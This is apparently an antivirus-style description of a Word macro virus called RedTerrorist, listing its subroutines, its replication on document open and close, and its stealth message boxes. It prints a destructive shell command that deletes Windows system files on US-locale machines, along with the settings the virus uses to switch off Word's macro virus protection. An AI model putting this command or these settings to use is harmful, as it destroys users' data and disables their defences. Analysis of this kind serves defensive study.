This is a non-polymorphic Word virus. The virus resides in the RedTerrorist module.
It has seven subroutines:
AutoOpen AutoClose FuckThemAll ToolsMacro ToolsCustomize ViewVBCode Delay
The virus replicates when a document is opened or closed.
These procedures only call the main infection routine of the virus, which is in the FuckThemAll routine.
This macro causes the system to pause before a message window is shown.
For i = 0 To 19170000 Next
Main virus routine. Checks system parameter ‘Country’ and if this is ‘US’ , it then then runs the command shell:
"c:command.com C echo y | del " + Environ("windir") + "system*.* > nul"
After that the virus sets the following parameters:
.SaveNormalPrompt = False .VirusProtection = False .AllowFastSave = True .BackgroundSave = True
The virus checks for the presence in the active document (or normal.dot)
ToolsCustomize, ToolsMacro, ViewVBCode:
These three routines are used for stealth; when executed they call the Delay routine and display Message Boxes:
Top level process aborted, cannot continue
Configuration too large for memory
Error in EXE file, program too big to fit in memory